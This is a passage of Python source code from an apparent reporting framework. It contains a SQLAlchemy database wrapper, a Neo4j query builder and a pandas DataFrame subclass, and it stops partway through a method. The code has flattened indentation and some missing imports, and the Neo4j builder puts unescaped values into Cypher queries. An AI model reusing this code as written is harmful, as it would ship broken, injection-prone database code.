ares_sqlalchemy = requires("sqlalchemy", reason='Missing Package', install='sqlalchemy', autoImport=True, sourceScript=__file__)
# TODO: Use correctly requires with sqlalchemy module
import sqlalchemy
from sqlalchemy.ext.declarative import declarative_base
from sqlalchemy.orm import sessionmaker
import importlib
import logging
import sys
import os
import datetime
import traceback
from ares.Lib import AresMarkDown
class SqlConn(object):
"""
:category: SQL Framework
:rubric: PY
:type: class
:dsc:
Base Class to create a database and perform SQL operations using the sqlalchemy interface
:link Documentation: https://www.pythonsheets.com/notes/python-sqlalchemy.html#join-joined-two-tables-via-join-statement
"""
_extPackages = None
def __init__(self, dbFamily, database=None, filename=None, modelPath=None, reset=False, migrate=True, **kwargs):
"""
:category: SQL Framework
:rubric: PY
:dsc:
    Here we try to set up, as generically as we can, all the environment variables for the DB.
    We try not to rely on the aresObj, so that this interface can be used in various contexts
"""
self.pkgs = {}
if self._extPackages is not None:
for name, package in self._extPackages:
self.pkgs[name] = requires(name, reason='Missing Package', install=package, autoImport=True, sourceScript=__file__)
    self.query = None # In this design each user manages his own database and decides who can look at the data.
    # This simplifies the permissioning a lot (we consider storage not to be a problem at this stage as we split per user).
    # It could also be interesting to check the user data use.
    # Some reports can get centralised databases using the module variable SINGLEDB
dbConfig = {'drivername': dbFamily, 'username': kwargs.get('username'), 'password': kwargs.get('password'), 'host': kwargs.get('host'),
'port': kwargs.get('port'), 'query': kwargs.get('query'), 'database': database}
self.dbPath = database
self.username = kwargs.get('username')
self.userhost = kwargs.get('userhost')
self.engine = sqlalchemy.create_engine(sqlalchemy.engine.url.URL(**dbConfig))
self.metadata = sqlalchemy.MetaData(bind=self.engine)
self.metadata.reflect()
self.metadata.create_all(self.engine)
self.session = sessionmaker(bind=self.engine)()
if modelPath:
self.loadSchema(filename=filename, modelPath=modelPath, reset=reset, migrate=migrate)
self.metadata.reflect()
def _loadSqlFile(self, fileName, reset, migrate):
"""
:param filePath:
:return:
"""
on_init_fnc = None
modelMod = importlib.import_module(fileName.replace('.py', ''))
for tableName, table in inspect.getmembers(modelMod):
if tableName == 'on_init':
on_init_fnc = table
elif '__' not in tableName and inspect.isroutine(table):
tableDef = getattr(modelMod, tableName)()
        tableDef.append(sqlalchemy.Column('lst_mod_dt', sqlalchemy.DateTime, default=datetime.datetime.utcnow, nullable=True)) # pass the callable: calling utcnow() here would freeze the default at schema-definition time
if not self.engine.has_table(tableName):
newTable = sqlalchemy.Table(tableName, self.metadata, *tableDef)
newTable.create(self.engine, checkfirst=True)
else:
# if migrate:
# oldTable = '__old_%s' % tableName
# self.cloneTable(tableName, oldTable, force=True)
# newTable = sqlalchemy.Table(tableName, self.metadata, *tableDef)
# newTable.drop(self.engine, checkfirst=True)
# newTable.create(self.engine, checkfirst=True)
# self.migrateTable(oldTable, tableName)
# sqlalchemy.Table(oldTable, self.metadata).drop(self.engine)
if reset:
newTable = sqlalchemy.Table(tableName, self.metadata, *tableDef)
newTable.drop(self.engine, checkfirst=True)
newTable.create(self.engine, checkfirst=True)
    # Run the defaults that need to happen on database creation
if on_init_fnc:
on_init_fnc(self)
def help(self, category=None, rubric=None, type=None, value=None, enum=None, section=None, function=None, lang='eng', outType=None):
"""
:category: Python function
:rubric: PY
:dsc:
Display the Python documentation of the requested object.
This is done by reading all the documentation from the object.
    Documentation is displayed in the Python console by default, but it can also be written to a static HTML page.
    It is possible to zoom into the documentation to get more details.
:example: aresObj.help()
"""
import collections
outStream = AresMarkDown.DocCollection(self.aresObj)
countMissing = collections.defaultdict(int)
outStream.title("AReS Databases")
outStream.append('''
The database framework in AReS is fully based on [SqlAlchemy]( https://www.sqlalchemy.org ). This Python module is an abstraction layer on top of a database. It will allow you to create, change and trash tables very easily.
    [SqlAlchemy]( https://www.sqlalchemy.org ) wraps any SQL database (MySQL, Oracle, PostgreSQL, ...)
''')
for method_name in dir(self):
if method_name in ['loadSchema', 'loadDataFile']:
continue
if function is not None and function != method_name:
continue
if not "__" in method_name and callable(getattr(self, method_name)):
varNames = inspect.getfullargspec(getattr(self, method_name)).args
outStream.hr()
outStream.title("Function %s(%s)" % (method_name, ", ".join(varNames)), level=2)
docStr = AresMarkDown.AresMarkDown.loads(getattr(self, method_name).__doc__)
outStream.append(docStr.getAttr('dsc'))
if docStr.getAttr('example') != '':
outStream.title("Examples", level=4)
outStream.code(docStr.getAttr('example'))
outStream.title("Arguments", level=4)
for varName in varNames:
if varName == 'self':
continue
if varName in ares.doc.DocAresPmts.PARAMETERS:
outStream.append("%s: %s" % (varName, outStream.params(varName)))
else:
countMissing[varName] += 1
outStream.src(__file__)
outStream.export(outType)
def loadSchema(self, filename=None, modelPath=None, reset=False, migrate=True):
"""
:category: SQL Framework
:rubric: PY
:dsc:
Function that takes care of initialising the DB
Please note that some column names are prohibited such as lst_mod_dt
"""
if not filename and not modelPath:
raise Exception("You need to specify at least a file name or a model path")
if modelPath:
sys.path.append(modelPath)
for pyFile in os.listdir(modelPath):
if not pyFile.endswith('.py') or pyFile == '__init__.py':
continue
if filename and filename != pyFile:
continue
self._loadSqlFile(pyFile, reset, migrate)
elif filename:
self._loadSqlFile(filename, reset, migrate)
  def cloneTable(self, oldTable, newTable, mapping=None, force=False):
    """
    :dsc: Helps to migrate between two tables. The mapping argument is used in case the column names differ between the two tables
    """
    oldTableSchema = sqlalchemy.Table(oldTable, self.metadata)
    newTableSchema = sqlalchemy.Table(newTable, self.metadata)
    if self.engine.has_table(newTable):
      newTableSchema.drop(self.engine, checkfirst=True)
    for column in oldTableSchema.columns:
      column.name = mapping.get(column.name, column.name) if mapping else column.name
      newTableSchema.append_column(column)
    newTableSchema.create(self.engine, checkfirst=True)
def migrateTable(self, fromTable, toTable, mapping=None):
"""
:dsc: copy data from one table to another
"""
    # getData() returns a pandas DataFrame, which exposes to_dict('records')
    oldData = self.select([fromTable]).getData()
    self.insert(toTable, oldData.to_dict('records'), commit=True)
def forceCreate(self):
"""
:category: SQL Framework
:rubric: PY
:type: Creation
:dsc:
Force the creation of the database in the given project
:return: The dbOjb
"""
Base = declarative_base()
Base.metadata.create_all(self.engine)
return self
def loadDataFile(self, fileName, filePath, reset=False, newTables=None):
"""
:category: SQL Framework
:rubric: PY
:example: aresObj.db().loadDataFile("youpi3.py")
:dsc:
Load a python sql file to the local database.
This will only add records and then commit the changes.
    These data should not be sensitive if they are stored and committed to the folder.
"""
sys.path.append(filePath)
dataMod = importlib.import_module(fileName.replace(".py", ""))
if hasattr(dataMod, 'data') and hasattr(dataMod, 'target'):
conn = self.engine.connect()
header = dataMod.data[0]
sqlTarget = self.table(dataMod.target)
if reset:
conn.execute(sqlTarget.delete())
if dataMod.target in newTables or newTables is None:
print("Loading data from %s" % dataMod.target)
if isinstance(header, list):
for rec in dataMod.data[1:]:
conn.execute(sqlTarget.insert().values(dict(zip(header, rec))))
else:
for rec in dataMod.data:
conn.execute(sqlTarget.insert().values(rec))
def where(self, stmts):
"""
:category: SQL Framework
:rubric: PY
:example:
      db.select().where([db.column("table", 'column') == 'X'])
db.select( ['BNP'] ).where([ db.column('BNP', 'date') == '22/04/2013 00:00'] ).toDf()
:dsc:
Add a where clause to the SqlAlchemy query.
:return: The python object itself
"""
for stmt in stmts:
self.query = self.query.where(stmt)
return self
def select(self, tableNames):
"""
:category: SQL Framework
    :rubric: PY
    :example: aresObj.db().select(["worldcup_teams"])
    :dsc:
    Create a SQL select statement
:link sqlalchemy: http://docs.sqlalchemy.org/en/latest/core/selectable.html
:link sqlalchemy: http://docs.sqlalchemy.org/en/latest/core/sqlelement.html
:return: self
"""
tables = [sqlalchemy.Table(table, self.metadata, autoload=True) for table in tableNames]
self.query = sqlalchemy.sql.select(tables)
return self
def insert(self, tableName, records, commit=False, colUserName=None):
"""
:category: SQL Framework
    :rubric: PY
:example: db.insert('table1',[{'name': 'test'}], commit=True)
:dsc:
insert a list of records to a table
:return: The python object itself
"""
dflt = {'lst_mod_dt': datetime.datetime.utcnow()}
errorCount, errorLog = 0, []
table = sqlalchemy.Table(tableName, self.metadata)
if not self.engine.has_table(table.name):
raise Exception("Table does not exist")
if colUserName is not None:
dflt[colUserName] = self.username
if 'hostname' in self.columnsList(tableName):
dflt['hostname'] = self.userhost
if isinstance(records, dict):
records = [records]
for rec in records:
try:
tmpRec = dict(rec)
tmpRec.update(dflt)
self.session.execute(table.insert().values(tmpRec))
except Exception as err:
logging.warning(traceback.format_exc())
errorCount += 1
errorLog.append(traceback.format_exc().split('\n')[-1])
if commit:
self.session.commit()
if errorCount:
return (False, errorCount, errorLog)
return (True, 0, [])
def getData(self, limit=None):
"""
:category: SQL Framework
:rubric: PY
:example: aresObj.db().getData()
:dsc:
Returns the results of the select statement previously instantiated in a pandas dataframe
:return: A pandas dataframe
"""
if self.query is None:
return None
if limit:
return ares_pandas.read_sql(self.query, self.query.bind).head(limit)
return ares_pandas.read_sql(self.query, self.query.bind)
def fetch(self, limit=None):
"""
:category: SQL Framework
:rubric: PY
:example: aresObj.db().fetch()
:dsc:
Similar to getData but return an iterator over a list instead of using pandas
:return: An iterator over the result of the query
"""
    if self.query is None:
      yield None
      return
counter = 0
if not limit:
limit = -1
    for row in self.engine.connect().execute(self.query):
      if limit != -1 and counter >= limit:
        return  # a plain return ends the generator (PEP 479: StopIteration would become a RuntimeError)
      counter += 1
      yield row
def tablesList(self):
"""
:category: SQL Framework
:rubric: PY
:example: aresObj.db().tablesList()
:dsc:
Return the list of tables defined in the selected database
:return: A python object with the list of tables
"""
return self.engine.table_names()
def columnsList(self, tableName):
"""
:category: SQL Framework
:rubric: PY
:example: aresObj.db().columnsList()
:dsc:
Return the list of columns defined in the selected database
:return: A python object with the list of tables
"""
table = sqlalchemy.Table(tableName, self.metadata)
if self.engine.has_table(table.name):
return table.columns
raise Exception('Table does not exist')
def table(self, tableName):
"""
:category: SQL Framework
:rubric: PY
:example: db.table('table1')
:dsc:
Return a sqlAlchemy table object. This can be useful in the where clauses
:return: Python table object
"""
if self.engine.has_table(tableName):
return sqlalchemy.Table(tableName, self.metadata)
raise Exception('Table does not exist')
def column(self, tableName, columnName):
"""
:category: SQL Framework
:rubric: PY
    :example: db.select().where([db.column("table", 'column') == 'X'])
:dsc:
Return a sqlAlchemy column object. This can be useful in the where clauses
:return: Python column object
"""
table = sqlalchemy.Table(tableName, self.metadata, autoload=True)
if self.engine.has_table(table.name):
return getattr(table.c, columnName)
def drop(self, tableName, withCheck=True):
"""
:category: SQL Framework
:rubric: PY
:example:
aresObj.db().drop('test')
aresObj.db().drop('test', withCheck=False)
:dsc:
Delete the table from the database.
      The pre-check can be disabled; the table will automatically be created again when the report is retriggered.
      There is no extra function to create a table: this is handled by the AReS framework
"""
if withCheck:
      try:
        name = input("Are you sure to delete the table %s (Y/N)? " % tableName)
      except NameError:
        # Python 2 fallback: there input() evaluates the typed text, raw_input() returns it
        name = raw_input("Are you sure to delete the table %s (Y/N)? " % tableName)
if name == 'Y':
sqlalchemy.Table(tableName, self.metadata, autoload=True).drop()
logging.info("Table %s deleted" % tableName)
else:
sqlalchemy.Table(tableName, self.metadata, autoload=True).drop()
logging.info("Table %s deleted" % tableName)
def delete(self, tableName, whereClauses=None, commit=False):
"""
:category: SQL Framework
:rubric: PY
:type:
:dsc:
This function will delete records matching the whereClauses from an existing table
:example: db.delete('test', [db.table('test').id == 1])
:return: self
"""
    if whereClauses:
      # .where() expects a clause element, so AND the list of conditions together
      self.engine.execute(self.table(tableName).delete().where(sqlalchemy.and_(*whereClauses)))
    else:
      self.engine.execute(self.table(tableName).delete())
if commit:
self.commit()
return self
def emptyTable(self, tableName):
"""
:category: SQL Framework
:rubric: PY
:type:
:dsc:
This function will empty an existing table
:example: db.emptyTable('test')
:return: self
"""
self.delete(tableName)
logging.info('Content of table %s deleted' % tableName)
self.commit()
return self
def commit(self):
self.session.commit()
def createTable(self, records, fileName, tableName, path=None, reset=False, migrate=True, commit=True, isAresDf=True):
"""
:example:
df = aresObj.file(htmlCode=r"IBRD_Balance_Sheet__FY2010.csv").read()
modelFilePath = df.saveTo(fileFamily="model")
db = aresObj.db(database=r"newTest.db").forceCreate()
dbObj.createTable(records=df, **modelFilePath)
"""
self.loadSchema(modelPath=path, filename=fileName, reset=reset, migrate=migrate)
self.insert(records=records.records(), commit=commit, tableName=tableName)
class AresSqlConn(SqlConn):
"""
:category: SQL Framework
:rubric: PY
  :dsc: Simple wrapper around SqlConn to simplify DB interactions for the AReS framework
"""
ARES_DEP = True
def __init__(self, aresObj, dbFamily, database=None, modelPath=None, reset=False, **kwargs):
"""
:category: SQL Framework
:rubric: PY
:dsc: Allocates the aresObj to access the user_reports folders
"""
self.aresObj = aresObj
if not modelPath and self.aresObj.run.host_name != 'Script':
modelPath = os.path.join(self.aresObj.run.local_path, 'model', 'tables')
if not os.path.exists(modelPath):
modelPath = None
super(AresSqlConn, self).__init__(dbFamily, database=database, modelPath=modelPath, reset=reset, **kwargs)
def loadDataFile(self, fileName, filePath=None, reset=False, newTables=None):
"""
:category: SQL Framework
:rubric: PY
:example: aresObj.db().loadDataFile("youpi3.py")
:dsc:
Load a python sql file to the local database.
This will only add records and then commit the changes.
    These data should not be sensitive if they are stored and committed to the folder.
"""
if not filePath:
filePath = self.aresObj.run.report_name
super(AresSqlConn, self).loadDataFile(fileName, filePath=filePath, reset=reset, newTables=newTables)
```
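A hedged usage sketch of `SqlConn` against a local SQLite file. It assumes SQLAlchemy 1.3-era APIs (`engine.has_table`, bound metadata), which the code above relies on, and a hypothetical `model_demo.py` in the working directory:
```python
# model_demo.py is assumed to define the table as a function named after it:
#   def demo(): return [sqlalchemy.Column('name', sqlalchemy.Text)]
db = SqlConn('sqlite', database='demo.db')
db.loadSchema(filename='model_demo.py', modelPath='.')
ok, errCount, errLog = db.insert('demo', [{'name': 'test'}], commit=True)
df = db.select(['demo']).getData()  # pandas DataFrame with the table content
```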
#### File: connectors/dbs/AresDbNeo4j.py
```python
from ares.Lib.AresImports import requires
import traceback
class AresNeo4j(object):
"""
:category: Connector
:rubric: PY
:type: Class
:dsc:
:link Documentation: https://neo4j.com/developer/python/
https://community.neo4j.com/?_ga=2.69585106.394662973.1539480121-615400289.1539480121
"""
ALIAS = 'NEO4J'
_extPackages = [("neo4j", 'neo4j-driver')]
def __init__(self, host=None, port=None, usr=None, pwd=None):
self.pkgs = {}
if self._extPackages is not None:
for name, package in self._extPackages:
self.pkgs[name] = requires(name, reason='Missing Package', install=package, autoImport=True, sourceScript=__file__)
self.driver = self.pkgs["neo4j"].GraphDatabase.driver('bolt://%s:%s' % (host, port), auth=(usr, pwd))
self.query = []
def raw_query(self, query):
try:
with self.driver.session() as session:
for rec in session.run(query):
yield rec
    except Exception:
      print(traceback.format_exc())
      return  # ends the generator cleanly (PEP 479)
def create(self):
self.query.append('CREATE')
return self
def match(self):
self.query.append('MATCH')
return self
def foreach(self, conditions):
"""
"""
    raise NotImplementedError  # NotImplemented is a value, not an exception class
def where(self, condition):
return self
def delete(self, node_names, detach=False):
if detach:
self.query.append('DETACH')
self.query.append('DELETE %s' % ','.join(node_names))
try:
with self.driver.session() as session:
session.run(self.compose(self.query))
self.query = []
return True
except:
print(traceback.format_exc())
self.query = []
return False
def retreive(self, names):
self.query.append('RETURN')
self.query.append(','.join(names))
return self
def clear(self):
"""
:dsc: Clears all nodes and edges from the Database
"""
return self.match().node('n').delete(['n'], detach=True)
def node(self, name='', labels=None, attr=None):
"""
    :dsc: adds the node pattern to the query
"""
if not labels:
labels = []
else:
labels[0] = ':%s' % labels[0]
if not attr:
attr = ''
else:
tmp_attr_list = []
for attr_key, attr_value in attr.items():
tmp_attr_list.append('%s: "%s"' % (attr_key, attr_value))
attr = '{%s}' % ','.join(tmp_attr_list)
self.query.append("(%s%s %s)" % (name, ':'.join(labels), attr))
return self
def link(self, labels='', attr=None, direction="from"):
"""
:dsc: adds the edge definition to the query
"""
if direction == 'from':
self.query.append('-[%s]->' % labels)
else:
self.query.append('<-[%s]-' % labels)
return self
def alias(self, aliases):
"""
:dsc: defines a set of aliases that will appear as WITH a, b, c, d as count(id)
The aliases argument will be defined as follows: ['a', 'b', 'c', {'d': 'count(id)'}]
"""
self.query.append('WITH')
tmp_query = []
for expression in aliases:
if isinstance(expression, dict):
for expr, alias in expression.items():
tmp_query.append('%s as %s' % (expr, alias))
else:
tmp_query.append(expression)
self.query.append(', '.join(tmp_query))
return self
def compose(self, query):
"""
:dsc: Simply joins the query clauses all together
"""
return ' '.join(query)
def execute(self):
try:
with self.driver.session() as session:
for rec in session.run(self.compose(self.query)):
yield rec
    except Exception:
      print(traceback.format_exc())
      return  # ends the generator cleanly (PEP 479)
```
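A sketch of composing a Cypher query with this fluent wrapper (host and credentials are placeholders; it needs a reachable Neo4j instance):
```python
g = AresNeo4j(host='localhost', port=7687, usr='neo4j', pwd='secret')
g.match().node('p', labels=['Person'], attr={'name': 'Alice'}).retreive(['p'])
print(g.compose(g.query))   # MATCH (p:Person {name: "Alice"}) RETURN p
for rec in g.execute():     # runs the composed query in a session
  print(rec)
```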
#### File: connectors/files/AresFileJson.py
```python
import json
from ares.Lib.connectors.files import AresFile
class FileJson(AresFile.AresFile):
"""
:category: Ares File
:rubric: PY
:type: Class
:dsc:
Parse the Json file
"""
__fileExt = ['.json']
label = "Interface to deal with Json files"
def _read(self, **kwargs):
"""
:category:
:rubric:
:type:
:dsc:
"""
    with open(self.filePath) as jsonFile:
      return json.load(jsonFile)
def write(self, data, isAresDf=False):
"""
:category:
:rubric:
:type:
:dsc:
"""
if isAresDf:
data = data.records()
self.setFolder()
with open(self.filePath, 'w') as outfile:
json.dump(data, outfile)
```
#### File: connectors/files/AresFilePandas.py
```python
import time
import os
import json
from ares.Lib.connectors.files import AresFile
from ares.Lib.js import AresJsEncoder
from ares.Lib.AresImports import requires
# Will automatically add the external library to be able to use this module
ares_pandas = requires("pandas", reason='Missing Package', install='pandas', autoImport=True, sourceScript=__file__)
class AresFileSeries(ares_pandas.Series):
@property
def _constructor(self):
return AresFileSeries
@property
def _constructor_expanddim(self):
return AresFileDataFrame
_metadata = ['filePath', 'aresObj', 'selectCols', '_ares_data', '_filters', 'htmlId', 'jsColsUsed']
# @classmethod
# def _internal_ctor(cls, *args, **kwargs):
# kwargs['htmlCode'] = None
# return cls(*args, **kwargs)
class AresFileDataFrame(ares_pandas.DataFrame):
"""
"""
__fileExt = ['.csv', '.txt']
label = "Pandas Dataframe Interface"
# https://docs.scipy.org/doc/numpy/reference/arrays.dtypes.html
dataTypeMap = {'object': {'python': 'str'}, 'int64': {'python': 'int'}, 'float64': {'python': 'float'}}
@property
def _constructor(self):
return AresFileDataFrame
@property
def _constructor_sliced(self):
return AresFileSeries
# @classmethod
# def _internal_ctor(cls, *args, **kwargs):
# print(kwargs)
# kwargs['htmlCode'] = None
# return cls(*args, **kwargs)
# Remove the error message by declaring the columns as metadata
_metadata = ['filePath', 'aresObj', 'selectCols', '_ares_data', '_filters', 'htmlId', 'jsColsUsed']
def __init__(self, data=None, filePath=None, aresObj=None, htmlCode=None, index=None, columns=None, dtype=None, copy=True):
super(AresFileDataFrame, self).__init__(data=data, index=index, columns=columns, dtype=dtype, copy=copy)
self.filePath, self.aresObj, self.selectCols, self._ares_data, self.htmlCode = filePath, aresObj, [], [], htmlCode.replace("/", "_") if htmlCode is not None else htmlCode
self._filters, self.htmlId, self.jsColsUsed = {}, 'recordset_%s' % id(self) if self.htmlCode is None else self.htmlCode.replace("/", "_"), set()
self.filePathNoExt, self.fileExtension = os.path.splitext(filePath) if filePath is not None else (None, None)
self.path, self.filename = os.path.split(filePath) if filePath is not None else (None, None)
@property
def exists(self):
return os.path.exists(self.filePath)
@property
def timestamp(self):
if self.exists:
return time.strftime("%Y%m%d_%H%M%S", time.gmtime())
def read(self, **kwargs):
"""
:example: df = aresObj.file(filename='BNPPARIBASBRA_2018-04-22.txt', path=r'.\ares\doc\data').read(usecols=['date', 'ouv', 'haut'], sep='\t')
"""
if self.filePath is not None:
htmlCode = kwargs.get('htmlCode', self.htmlCode)
if 'htmlCode' in kwargs:
del kwargs['htmlCode']
self._ares_data = AresFileDataFrame(data=ares_pandas.read_csv(self.filePath, sep=kwargs["delimiter"] if kwargs.get("delimiter") is not None else '\t', **kwargs), filePath=self.filePath, aresObj=self.aresObj, htmlCode=htmlCode)
      # TODO: Remove this when we migrate to a list of lists instead of a dictionary
cols = dict([(col, col.replace("[", "").replace("]", "").replace("(", "").replace(")", "")) for col in self._ares_data.headers])
self._ares_data.rename(cols, axis='columns', inplace=True)
return self._ares_data
def save(self, **kwargs):
"""
"""
if 'htmlCode' in kwargs and self.aresObj is not None:
self.filename = kwargs['htmlCode']
self.htmlCode = kwargs['htmlCode'].replace("/", "_")
self.path = self.aresObj.run.local_path
if self.path is None:
raise Exception("save error. Path not defined, plase add an html code in this function")
if not os.path.exists(self.path):
os.makedirs(self.path)
self.to_csv(os.path.join(self.path, self.filename), index=kwargs.get("index", False), sep=kwargs["delimiter"] if kwargs.get("delimiter") is not None else '\t', encoding=kwargs.get("encoding", 'utf8'))
def saveTo(self, fileFamily, filePath=None, dbName=None):
"""
"""
facts = AresFile.loadFactory()
if fileFamily.lower() in facts:
if filePath is None:
filePath = self.filePath.replace( self.fileExtension, fileFamily)
newFile = facts[fileFamily](filePath)
newFile.write(self, isAresDf=True)
path, fileName = os.path.split(filePath)
return {'fileName': fileName, 'path': path}
elif fileFamily.lower() == 'model':
if filePath is None:
filePath = self.filePath.replace( self.fileExtension, ".py")
dbName = self.filename.split('.')[0] if dbName is None else dbName
dbTableFile = ["import sqlalchemy", "def table(meta):"]
dbMapType = {"object": 'Text', 'int64': 'Integer', 'float64': 'REAL'}
dbTableFile.append(" return sqlalchemy.Table('%s', meta, " % dbName)
for i, h in enumerate(list(self.dtypes)):
dbTableFile.append(" sqlalchemy.Column('%s', sqlalchemy.%s, nullable=False)," % (self.dtypes.index[i], dbMapType[str(h)]) )
dbTableFile.append(" )")
      with open(filePath, "w") as outFile:
        outFile.write("\n".join(dbTableFile))
path, fileName = os.path.split(filePath)
return {'fileName': fileName, 'path': path, 'tableName': dbName}
@property
def headers(self): return list(self.dtypes.index)
@property
def types(self):
return [['Column Name', 'Type']] + [[self.dtypes.index[i], self.dataTypeMap[str(d)]['python']] for i, d in enumerate(list(self.dtypes))]
@property
def details(self):
return [['Attribute', 'Value'], ['Columns count', self.shape[1]], ['Rows count', self.shape[0]], ["Timestamp", self.timestamp]]
@property
def count(self): return self.shape[0]
def max(self, column): return self.loc[self[column].idxmax()][column]
def min(self, column): return self.loc[self[column].idxmin()][column]
def dict(self, index, value):
"""
:category: Dataframe
:rubric: PY
:type: Pandas
:example: aresDf.dict("col1", "col2")
:dsc:
Create a dictionary from two Pandas Dataframe columns
:link Pandas documentation: https://pandas.pydata.org/pandas-docs/version/0.22/generated/pandas.DataFrame.to_dict.html
:return: Python dictionary
"""
return ares_pandas.Series(self[value].values, index=self[index]).to_dict()
def forEach(self, fnc, inplace=True, **kwds):
"""
:category: Dataframe
:rubric: PY
:type: Transformation
:dsc:
Functional way to transform each records in a dataframe.
The function should return a new dictionary which will be added to the new underlying records object.
:return: The AReS Dataframe
:example: dfObj.forEach(lambda rec: {'a': rec['a'] + 4, "b": "aa%s" % rec['b'] }, inplace=False )
"""
    tmpDf = AresFileDataFrame([fnc(rec, **kwds) for rec in self.to_dict(orient='records')])
    # NOTE: rebinding self here cannot mutate the caller's object, so the
    # transformed frame is returned in both cases; callers should keep the result
    return tmpDf
def to_numeric(self, colNames):
if self.empty:
return self
if isinstance(colNames, list):
for colName in colNames:
self[colName] = self[colName].apply(ares_pandas.to_numeric)
else:
self[colNames] = self[colNames].apply(ares_pandas.to_numeric)
return self
def addColMap(self, dstColName, srcColName, mapDict, intKey=None, dflt='', replace=True):
"""
:category: Python - Pandas wrapper
:example: dfObj.addColMap('test', 'col1', {"col1": 1, "b": 2}, intKey="b" )
:dsc:
      Add a column from a Python dictionary.
:return: The AReS Dataframe itself
:link Pandas documentation: https://pandas.pydata.org/pandas-docs/version/0.22/generated/pandas.DataFrame.apply.html
"""
if intKey is None:
self.addCol(dstColName, lambda row: mapDict.get(row[srcColName], dflt))
else:
self.addCol(dstColName, lambda row: mapDict.get(row[srcColName], {}).get(intKey, dflt))
if replace:
self.dropCol([srcColName])
return self
def top(self, n, colName, ascending=False):
"""
:category: Python - Pandas wrapper
:example: aresDf.top(10, "col1")
:dsc:
Return a new AReS dataframe with only the Nth top values in the selected column
:link Pandas documentation: https://pandas.pydata.org/pandas-docs/stable/generated/pandas.DataFrame.sort_values.html
:return: A reduced AReS Dataframe
"""
return self.sort_values(colName, ascending=ascending).head(n)
def addCol(self, colName, fnc, isJsUsed=True, axis=1):
"""
:category: Dataframe
:example: dfObj.addCol('test', lambda x: x['col1'] + 2)
:dsc:
Add a column to the existing Dataframe according to a special function.
:return: The AReS Dataframe itself
:link Pandas documentation: https://pandas.pydata.org/pandas-docs/version/0.22/generated/pandas.DataFrame.apply.html
"""
    self[colName] = self.apply(fnc, axis=axis)
    if isJsUsed:
      self.jsColsUsed.add(colName)  # track the column name for the JS layer
    return self
def reduce(self, colNames, inplace=True):
"""
:return: Return the or a new AReS Dataframe
"""
for colName in colNames:
self.jsColsUsed.add(colName)
colsToDrop = []
for col in self.headers:
if not col in colNames:
colsToDrop.append(col)
if inplace:
self.drop(colsToDrop, axis=1, inplace=inplace)
return self
else:
return AresFileDataFrame(self.drop(colsToDrop, axis=1, inplace=inplace))
def lookupCol(self, left_on, df2, cols, renameCols, right_on=None, aggFnc=None):
"""
:return: Return the AReS Dataframe
"""
if right_on is None:
right_on = left_on
tempDf = df2.df[[right_on] + cols]
tempDf.rename(renameCols, axis=1, inplace=True)
newDf = ares_pandas.merge(self, tempDf, how='left', left_on=left_on, right_on=right_on).fillna(0)
if aggFnc is not None:
headers = self.headers
for col in renameCols.values():
if "%s_x" % col in headers and "%s_y" % col in headers:
if aggFnc == 'sum':
newDf.addCol(col, lambda x: x['%s_x' % col] + x['%s_y' % col])
elif aggFnc == 'avg':
newDf.addCol(col, lambda x: (x['%s_x' % col] + x['%s_y' % col]) / 2)
newDf.dropCol( ['%s_x' % col, '%s_y' % col])
return newDf
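  # Usage sketch for lookupCol (hypothetical column names; df2 is another AReS Dataframe wrapper exposing .df):
  #   newDf = aresDf.lookupCol("isin", df2, ["qty"], {"qty": "quantity"}, aggFnc="sum")
  # brings the "qty" column of df2 in as "quantity", summing it with an existing "quantity" column if both sides define one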
def dropCol(self, colNames, inplace=True):
"""
:category: Dataframe
:rubric: PY
:type: Pandas
    :example: dfObj.dropCol(["col1", "col2"])
    :dsc:
    Remove one or several columns from the Dataframe.
    :return: The AReS Dataframe itself if inplace is True, otherwise a new AReS Dataframe
"""
dfHeader = self.headers
if isinstance(colNames, list):
if inplace:
for colName in colNames:
if colName in dfHeader: # Need to check as the export will create a first column
if colName in self.jsColsUsed:
              self.jsColsUsed.remove(colName)
self.drop(colName, axis=1, inplace=inplace)
return self
else:
firstCol = True
for colName in colNames:
if colName in dfHeader:
# Need to check as the export will create a first column
if firstCol:
newDf = self.drop(colName, axis=1, inplace=False)
else:
newDf.drop(colName, axis=1, inplace=True)
return self.aresObj.df(newDf)
else:
if colNames in dfHeader:
# Need to check as the export will create a first column
        if colNames in self.jsColsUsed and inplace:
          self.jsColsUsed.remove(colNames)
        if inplace:
          # pandas drop returns None when inplace=True, so return the Dataframe itself
          self.drop(colNames, axis=1, inplace=True)
          return self
        return self.aresObj.df(self.drop(colNames, axis=1, inplace=False))
return self
def sort(self, colsIdx, ascending=True, axis=0, inplace=True):
"""
:category: Python - Pandas wrapper
:example: aresDf.sort("col1")
:dsc:
Function to sort the content of a dataframe according to a defined column
:link Pandas documentation: https://pandas.pydata.org/pandas-docs/stable/generated/pandas.DataFrame.sort_values.html
:return: A reduced AReS Dataframe
"""
self.sort_values(colsIdx, ascending=ascending, axis=axis, inplace=inplace)
return self
def tolist(self, colName, dropDuplicates=False, withAll=False):
"""
:category: Dataframe
:rubric: PY
:type: Transformation
:dsc:
Get from a dataframe a single series based on its column name
    :example: data.tolist("b", dropDuplicates=True) # This will remove the duplicated entries
:return: Return a Python list with or without duplicated entries
"""
if dropDuplicates:
if withAll:
return [''] + self[colName].drop_duplicates().tolist()
return self[colName].drop_duplicates().tolist()
if withAll:
return [''] + self[colName].tolist()
return self[colName].tolist()
def attach(self, htmlObj):
"""
:category: Dataframe
:rubric: JS
:type: Front End
:dsc:
    Attach the Dataframe to a HTML Object. This function is normally used in the different components in order
    to guarantee the link of the data. This will also ensure that the same data set will be stored only once in the page
"""
self.aresObj.jsSources[self.htmlCode]['containers'].append(htmlObj)
def records(self, selectCols=None, dropna=None):
"""
:category: Dataframe
:rubric: PY
:type: Transformation
:dsc:
    Return a clean list of dictionaries. If selectCols is set to False, no clean-up based on the
    selected columns in the report will be performed and all the columns will remain in the report.
    :return: A list of records (one dictionary per row)
"""
selectCols = self.selectCols if selectCols is None else selectCols
dropna = self.dropna if dropna is None else dropna
if selectCols:
self.reduce(self.jsColsUsed)
if dropna:
      return [{k: v for k, v in m.items() if ares_pandas.notnull(v)} for m in self.to_dict(orient='records')]
return self.to_dict(orient='records')
def toList(self):
"""
:category: Dataframe
:rubric: PY
:type: Transformation
:dsc:
:return: A list of lists with the data
"""
if len(self.selectCols) == 0:
self.selectCols = self.columns.tolist()
return [self.selectCols] + self[self.selectCols].values.tolist()
def html(self):
# for filterId, filterDefinition in self._filters.items():
# jsFilters = []
# for rule in filterDefinition['filters']:
# jsFilters.append("if (!( %s )) { validLine = false ;} ;" % rule)
# self.aresObj.jsGlobal.fnc('%s(data)' % filterId, '''
# filteredData = [];
